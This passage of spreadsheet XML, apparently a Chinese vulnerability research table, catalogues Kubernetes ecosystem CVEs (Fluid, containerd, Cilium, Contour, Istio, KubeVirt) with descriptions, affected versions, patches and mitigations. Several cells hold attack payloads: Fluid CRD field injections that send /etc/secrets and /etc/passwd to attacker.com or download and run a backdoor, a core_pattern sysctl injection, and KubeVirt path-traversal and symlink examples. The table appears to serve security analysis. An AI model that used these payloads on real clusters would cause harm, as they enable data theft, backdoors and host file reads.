     value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]</t>
    </r>
  </si>
  <si>
    <t>系统服务配置注入</t>
  </si>
  <si>
    <t>内核参数注入</t>
  </si>
  <si>
    <t>cri-server
admission webhook:
a. 配置修改：
yamlCopy# 设置manage_ns_lifecycle为false(1.19和1.20版本可用)
b. 使用准入Webhook：
yamlCopy# 拒绝sysctl值中包含'+'的Pod
c. 使用PodSecurityPolicy(已弃用)：
yamlCopyapiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: sysctl-psp
spec:
  forbiddenSysctls:
    - "*"</t>
  </si>
  <si>
    <t>0 day</t>
  </si>
  <si>
    <t xml:space="preserve">与cri-o 的CVE-2022-1708 同源
1. 项目缺少go,mod 文件需要自行生成 -&gt; 项目里的一些依赖路径与现有版本存在差异
直接使用 go get : go get github.com/AliyunContainerService/pouch@latest
</t>
  </si>
  <si>
    <t xml:space="preserve">修复版本前: </t>
  </si>
  <si>
    <t>fd8d661845992d45ce10c509acb17eac2d161cee</t>
  </si>
  <si>
    <t>https://github.com/fluid-cloudnative/fluid/security/advisories/GHSA-wx8q-4gm9-rj2g</t>
  </si>
  <si>
    <t>pouch container</t>
  </si>
  <si>
    <t>Pod.Spec.Containers.lifecycle.preStop.exec.command
Pod.Spec.Containers.lifecycle.postStart.exec.command</t>
  </si>
  <si>
    <t>932d06886826fd5dfae336c41c2d798670933fe0</t>
  </si>
  <si>
    <t>go932.19</t>
  </si>
  <si>
    <t>CVE-2023-51699</t>
  </si>
  <si>
    <t>不确定</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">OS command injection vulnerability within the Fluid project's JuicefsRuntime can potentially allow an authenticated user, who has the authority to create or update the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>K8s CRD Dataset/JuicefsRuntime</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>, to execute arbitrary OS commands within the juicefs related containers. This could lead to unauthorized access, modification or deletion of data.</t>
    </r>
  </si>
  <si>
    <t>&lt;0.9.3</t>
  </si>
  <si>
    <t>0.9.3
补丁：https://github.com/fluid-cloudnative/fluid/commit/02b7cd8b79a26092df95d625664994bda485c722</t>
  </si>
  <si>
    <t>fluid</t>
  </si>
  <si>
    <t xml:space="preserve">攻击者需要是已认证用户
攻击者需要有权限创建或更新Dataset/JuicefsRuntime CRD
目标环境使用的Fluid版本低于0.9.3
</t>
  </si>
  <si>
    <t>数据窃取攻击
利用注入点执行命令将敏感数据（如配置文件、密钥、环境变量）发送到外部服务器
例如：在mountPath中注入命令：/mnt; curl -d "$(cat /etc/secrets)" http://attacker.com/collect #
持久化后门攻击
注入命令下载并执行恶意程序，建立持久访问通道
例如：在bucket参数中注入：bucket; wget -O /tmp/backdoor http://attacker.com/backdoor &amp;&amp; chmod +x /tmp/backdoor &amp;&amp; nohup /tmp/backdoor &amp;
横向移动攻击
利用容器内的网络访问尝试访问集群中的其他服务
例如：在subPath中注入：/data; nmap -p 80,443,8080 10.0.0.0/16 &gt; /tmp/scan #
权限提升尝试
探测容器配置，寻找可能的权限提升途径
例如：在options中注入：cache=1; find / -perm -4000 &gt; /tmp/suid-files #</t>
  </si>
  <si>
    <t>垂直+水平提权</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Dataset 或者 JuicefsRuntime</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
====================
apiVersion: data.fluid.io/v1alpha1
kind: Dataset
metadata:
  name: malicious-dataset
spec:
  mounts:
    # mount.name 是一个命令注入点
    - name: "juicefs-test; id &gt; /tmp/pwned #"
      mountPoint: "juicefs://sample"
---
apiVersion: data.fluid.io/v1alpha1
kind: JuicefsRuntime
metadata:
  name: malicious-juicefs-runtime
spec:
  replicas: 1
  juicefs:
    # 配置一个可工作的JuiceFS实例，但在多个点注入命令
    # 配置注入点
    configs:
      # storage参数的命令注入
      storage: "s3; curl http://attacker.com/stolen-data?data=$(cat /etc/passwd | base64) #"
      # bucket参数的命令注入
      bucket: "my-bucket; wget -O /tmp/backdoor http://attacker.com/backdoor &amp;&amp; chmod +x /tmp/backdoor &amp;&amp; /tmp/backdoor #"
      # 格式化选项中的命令注入
      formatOptions:
        - "local-port=9999; echo 'net is evil' &gt; /tmp/net #"
    # 挂载点注入
    fuse:
      # mountPath参数的命令注入
      mountPath: "/runtime-mnt; touch /tmp/i-was-here #"
      # 子路径命令注入
      subPath: "/subpath; ls -la / &gt; /tmp/ls-output #"
      # 挂载选项命令注入
      options:
        - "attr-cache=1; cat /proc/self/environ &gt; /tmp/env #"
    # worker挂载点注入
    worker:
      mountPath: "/worker-mnt; ps aux &gt; /tmp/processes #"
      options:
        - "cache-size=1024; find /var/run -type s &gt; /tmp/sockets #"
  # 其他必要的配置
  tieredstore:
    levels:
      - mediumtype: MEM
        path: /dev/shm
        quota: 150Mi
        high: "0.95"
        low: "0.7"</t>
    </r>
  </si>
  <si>
    <t>命令注入</t>
  </si>
  <si>
    <t>controller</t>
  </si>
  <si>
    <t>0.9.2</t>
  </si>
  <si>
    <t>go0.19</t>
  </si>
  <si>
    <t>1. 代码执行存在部分问题</t>
  </si>
  <si>
    <t xml:space="preserve">master 版本以及之前的版本: 83433223b12289937e150de3a613b2cdeead1a27
</t>
  </si>
  <si>
    <t>epic-gateway</t>
  </si>
  <si>
    <t>配置注入</t>
  </si>
  <si>
    <t xml:space="preserve">Epic.spec.base.gue-ingress-nics </t>
  </si>
  <si>
    <t>go.19</t>
  </si>
  <si>
    <t>CVE-2022-31030</t>
  </si>
  <si>
    <t>与cri-o 的CVE-2022-1708 同源
Similar fix in cri-o's CRI implementation GHSA-fcm2-6c3h-pg6j（https://github.com/cri-o/cri-o/security/advisories/GHSA-fcm2-6c3h-pg6j）
类型：内存耗尽导致的拒绝服务(DoS)漏洞
位置：containerd的CRI实现中的ExecSync API
原因：容器内程序可导致无限内存消耗</t>
  </si>
  <si>
    <t>A bug was found in containerd's CRI implementation where programs inside a container can cause the containerd daemon to consume memory without bound during invocation of the ExecSync API. This can cause containerd to consume all available memory on the computer, denying service to other legitimate workloads. Kubernetes and crictl can both be configured to use containerd's CRI implementation; ExecSync may be used when running probes or when executing processes via an "exec" facility.</t>
  </si>
  <si>
    <t>&lt;= 1.5.12, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5</t>
  </si>
  <si>
    <t>1.5.13, 1.6.6
https://github.com/containerd/containerd/commit/c1bcabb4541930f643aa36a2b38655e131346382</t>
  </si>
  <si>
    <t>https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf</t>
  </si>
  <si>
    <t>containerd</t>
  </si>
  <si>
    <t>Pod.Spec.Containers.lifecycle.preStop.exec.command
Pod.Spec.Containers.lifecycle.postStart.exec.command
命令参数注入</t>
  </si>
  <si>
    <t>1.5.12</t>
  </si>
  <si>
    <t>Excessive processing time required for rules with long DNS names（ fuzzer audit)</t>
  </si>
  <si>
    <t xml:space="preserve">1. 安全审计报告明确指出输入是从Custom Resource 字段输入的
ciliumnetworkpolicies crd
</t>
  </si>
  <si>
    <t>https://github.com/cilium/cilium/pull/35577/commits/1418327b19fddea6ae6c81aea0bcc172367cd845#diff-1c9bc88a1372a2e7d3e61cee951979d630349bfd3181199c6bb3a9f270f4da21</t>
  </si>
  <si>
    <t>cilium</t>
  </si>
  <si>
    <t>资源配置注入</t>
  </si>
  <si>
    <t xml:space="preserve">A fuzzer found that a well-crafted payload passed to
github.com/cilium/cilium/pkg/fqdn/matchpattern.ValidateWithoutCache() would
cause Cilium to spend excessive time on a single process. 
regexp.Compile(TESTCASE)
</t>
  </si>
  <si>
    <t>解析注入-&gt;资源解析注入</t>
  </si>
  <si>
    <t>ciliumnetworkpolicies.matchPattern/matchName</t>
  </si>
  <si>
    <t>解析注入</t>
  </si>
  <si>
    <t>regexp.Compile(TESTCASE)
正则表达式解析</t>
  </si>
  <si>
    <t>API-server</t>
  </si>
  <si>
    <t>加check
直接在crd配置文件中新增限制-&gt; api-server 端格式化校验</t>
  </si>
  <si>
    <t>CVE-2023-39347</t>
  </si>
  <si>
    <t>绕过K8s本身的安全策略</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">An attacker with the ability to update pod labels can cause Cilium to apply incorrect network policies. This issue arises due to the fact that on pod update, Cilium incorrectly uses user-provided pod labels to select the policies which apply to the workload in question
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Kubernetes users may update Pod labels to bypass network policy
</t>
    </r>
  </si>
  <si>
    <t>Affected versions
&lt;=1.13.6
&lt;=1.14.1
&lt;=1.12.13</t>
  </si>
  <si>
    <t>Patched versions
1.13.7
1.14.2
1.12.14
https://github.com/cilium/cilium/commit/5e0c80ec3554ca932cf63d7bacf0421cddd5a6d4#diff-88ca21b0a674cf83e6a476c3e94360cbe33411a60a4c3953e3c4d2b75c681d09R230</t>
  </si>
  <si>
    <t>https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww</t>
  </si>
  <si>
    <t>1.This attack requires the attacker to have Kubernetes API Server access, as described in the Cilium Threat Model.
2. 用户可以更新pod  label</t>
  </si>
  <si>
    <t>通过更新pod标签来绕过网络安全策略的实施-&gt; 网络安全策略组件本身实现问题</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> user-provided pod labels 
Key为：`k8s:io.kubernetes.pod.namespace` and `io.cilium.k8s.policy.*
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>修复代码列出了4个需要sanitizered 的label:</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
k8sconst.PodNamespaceMetaLabels:    {},
  k8sconst.PolicyLabelServiceAccount: {},
  k8sconst.PolicyLabelCluster:        {},
  k8sconst.PodNamespaceLabel:         {},</t>
    </r>
  </si>
  <si>
    <t>标签</t>
  </si>
  <si>
    <t>系统配置</t>
  </si>
  <si>
    <t>系统配置策略选择</t>
  </si>
  <si>
    <t>加check</t>
  </si>
  <si>
    <t>CVE-2021-32783</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">典型的配置字段注入漏洞,通过注入特制的ExternalName配置值,绕过了访问控制获取管理接口访问权限。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>-&gt; 特定的类型的service 的特定字段是需要进行校验的（跨应用场景迁移？）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Contour is a Kubernetes ingress controller using Envoy proxy. In Contour before version 1.17.1 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>a specially crafted ExternalName type Service may be used to access Envoy's admin interface,</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">The issue will be addressed in Contour v1.18.0 and a cherry-picked patch release, v1.17.1, has been released to cover users who cannot upgrade at this time. For more details refer to the linked GitHub Security Advisory.
ExternalName Service的解析不严格
</t>
    </r>
  </si>
  <si>
    <t>Affected versions
All versions &lt;= 1.16, 1.17.0</t>
  </si>
  <si>
    <t>Patched versions
v1.14.2, 1.15.2, 1.16.1, 1.17.,1, 1.18.0 and up
https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e#diff-2bccd12038093a940b9650f8acc7afb73a6d50cf5e37374f2c9264e96d23df6cR68</t>
  </si>
  <si>
    <t>https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc</t>
  </si>
  <si>
    <t>contour</t>
  </si>
  <si>
    <t>1.修改具有ExternalName Type 的service, 
2. 部署该service 可以允许外部用户访问envoy的控制屏幕的API：可以操作envoy、更改流量路由配置、获取envoy用于与contour进行更新配置文件的TLS 密钥对。（it could be used to shut down or drain Envoy, change traffic routing,）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>ExternalName为内部地址
-&gt; Contour解析ExternalName
-&gt; 访问该地址对应的Envoy Admin Interface(默认:http://127.0.0.1:9901)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
资源的不正确配置导致暴露内部组件的高权限的API
Service ExternalName 
-&gt; Contour处理解析
-&gt; Envoy配置生成
-&gt; 绕过访问控制
-&gt; 访问Envoy Admin接口
可能的影响：
访问Admin接口
├── DoS攻击
│   ├── 关闭Envoy
│   └── 排空流量(drain)
├── 信息泄露
│   └── 暴露Secret元信息
└── 流量控制
    └── 修改路由规则</t>
    </r>
  </si>
  <si>
    <t>DOS.拒绝服务</t>
  </si>
  <si>
    <t>service.ExteranlType</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">写service 资源-&gt; 生成网络配置 
影响网络策略配置
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>涉及基础资源操作</t>
    </r>
  </si>
  <si>
    <t>https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e</t>
  </si>
  <si>
    <t>Possible disk exhaustion when extracting
archive file</t>
  </si>
  <si>
    <t>安全审计报告（2023)
Istio audit report - ADA Logics - 2023-01-30 - v1.0</t>
  </si>
  <si>
    <t xml:space="preserve">The Operator Helm URL Fetcher has a possible disk exhaustion vulnerability. If the chart is
bigger than the available disk space, a Denial-of-Service scenario would happen.
</t>
  </si>
  <si>
    <t>https://github.com/istio/istio/pull/41705</t>
  </si>
  <si>
    <t>恶意URL -&gt; 下载过程 -&gt; 解压过程 -&gt; 磁盘耗尽</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">关键注入字段分析：
主要注入字段：f.url
类型：URL 字符串
来源：用户输入
用途：指定 Helm Chart 下载地址
次要影响字段：f.destDirRoot
类型：目标路径
用途：指定解压目标目录
-----
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>说明：
表面注入字段：URL
实际注入载荷：Chart 内容大小
注入影响：系统资源（磁盘空间）</t>
    </r>
  </si>
  <si>
    <t>不涉及具体的资源字段</t>
  </si>
  <si>
    <t>压缩包解析
saved, err := DownloadTo(f.url, f.destDirRoot)
    // 注入点 2: 压缩包解析过程
    return tgz.Extract(reader, f.destDirRoot)</t>
  </si>
  <si>
    <t>更安全的api使用方式：
限制io的大小</t>
  </si>
  <si>
    <t>CVE-2022-1798（ 存在多个攻击向量）</t>
  </si>
  <si>
    <t>类型：目录遍历/文件读取漏洞
位置：KubeVirt VMI规范中的路径验证
原因：未正确验证相对路径</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/&lt;&gt; is not accessible.
---
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>提出了3个</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>attack vector</t>
    </r>
  </si>
  <si>
    <t>Affected versions
0.20 &gt;= x &lt;= 0.55.0</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>Patched versions
0.55.1</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
https://github.com/kubevirt/kubevirt/pull/8198
https://github.com/kubevirt/kubevirt/pull/8268
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF800080"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>google research:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF800080"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF800080"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm</t>
    </r>
  </si>
  <si>
    <t>kubevirt</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">权限前提：
yamlCopy# 需要具备的权限：
- 创建/修改VMI的权限
- 创建/上传容器镜像的权限
- 使用containerDisk的权限
环境前提：
yamlCopy# 需要满足：
- 运行有漏洞版本的KubeVirt（&lt; 0.55.1）
- 目标集群支持VMI功能
- 未禁用containerDisk功能
配置前提：
yamlCopy# 以下任一条件：
- HotplugVolumes特性门控已启用（用于PVC热插拔攻击）
- 允许使用containerDisk
- 未严格限制spec.domain.firmware.kernelBoot配置
安全机制：
yamlCopy# 可能影响利用的因素：
- SELinux是否启用（启用会部分阻止文件读取）
- 是否有策略控制器限制VMI配置
- 是否有额外的安全机制
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>3个攻击向量的详细利用条件：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
# 三种攻击向量的具体前提：
1. 相对路径注入：
- 能够创建VMI
- 可以指定volumes配置
2. 恶意容器镜像：
- 能够构建和推送镜像
- 集群可以拉取该镜像
- 可以在VMI中使用自定义镜像
3. PVC热插拔：
- HotplugVolumes功能已启用
- 有权限创建和管理PVC</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>挂载目录，目录遍历</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>》</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">越权
- 可读取主机任意文件
- 影响virt-launcher pod
- 可能导致敏感信息泄露
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>涉及3个攻击向量：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
a. 通过VMI规范注入相对路径：
yamlCopyapiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
spec:
  volumes:
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      path: test3/../../../../../../../../etc/passwd  # 路径遍历
b. 通过恶意容器镜像：
dockerfileCopyFROM anybase
RUN mkdir -p /etc/ &amp;&amp; touch /etc/passwd
RUN mkdir -p /disks/ &amp;&amp; ln -s /etc/passwd /disks/disk.img
c. 通过PVC热插拔：
利用用户控制的PVC
放置绝对路径符号链接</t>
    </r>
  </si>
  <si>
    <t>越权</t>
  </si>
  <si>
    <t>水平提权</t>
  </si>
  <si>
    <t>外部输入源： 容器镜像
直接注入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> VirtualMachineInstance.
# 三个主要的漏洞字段：
- spec.domain.firmware.kernelBoot.container.kernelPath
- spec.domain.firmware.kernelBoot.container.initrdPath
- spec.volumes[*].containerDisk.path
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>示例：
通过VMI规范注入相对路径：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
yamlCopyapiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
spec:
  volumes:
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      path: test3/../../../../../../../../etc/passwd  # 路径遍历</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">文件操作
# 当使用containerDisk时，KubeVirt的处理流程：
1. 拉取容器镜像
2. 以virt-launcher Pod形式运行
3. 将容器中的磁盘文件挂载到主机
4. VMI通过主机路径访问磁盘
# 关键点：符号链接在主机上解析，而不是在容器内
容器内: /disks/disk.img -&gt; /etc/passwd
↓
主机上解析符号链接时：
/disks/disk.img -&gt; /etc/passwd (指向主机的文件)
VMI -&gt; 虚拟设备(/dev/vdc) -&gt; 主机上的符号链接 -&gt; 主机文件系统
</t>
  </si>
  <si>
    <t>controller
准入控制器
----
In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">增加check
更改sink点：
使用更安全的api
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. 核心修复措施 - 引入safepath包：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>主要特点：
- 引入 safepath.Path 和 safepath.File 类型
- 不跟随符号链接
- 保持初始根上下文
- 基于unix.*At()文件函数构建抽象</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
2.具体修复点
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>a. 路径处理安全性：
- virt-chroot: 使用解析后的真实路径进行挂载操作
- containerdisks: 完全使用安全路径操作
- 隔离检测器: 提供safepath.Path而不是简单字符串路径
b. API限制：
- virt-api: 不再接受相对路径
- host-disks: 不再自动重新标记selinux标签
c. 安全路径创建方式：
- safepath.JoinWithRelativeRoot(): 从任意路径创建实际路径
- safepath.NewFile(): 从给定的真实和已解析路径创建路径对象</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>CVE-2020-14316</t>
  </si>
  <si>
    <t>类型：主机文件系统访问漏洞
影响版本：KubeVirt 0.29及更早版本
影响组件：Virtual Machine Instances (VMIs)</t>
  </si>
  <si>
    <t>A flaw was found in kubevirt 0.29 and earlier. Virtual Machine Instances (VMIs) can be used to gain access to the host's filesystem. Successful exploitation allows an attacker to assume the privileges of the VM process on the host system. In worst-case scenarios an attacker can read and modify any file on the system where the VMI is running. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>&lt;kubevirt 0.30
kubevirt 0.29 and earlier</t>
  </si>
  <si>
    <t>kubevirt 0.30
https://github.com/kubevirt/kubevirt/pull/3686</t>
  </si>
  <si>
    <t>https://bugzilla.redhat.com/show_bug.cgi?id=1848951</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>权限前提：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
yamlCopy# </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>需要具备的权限：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>创建</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>修改</t>
    </r>
    <r>
      <rPr>
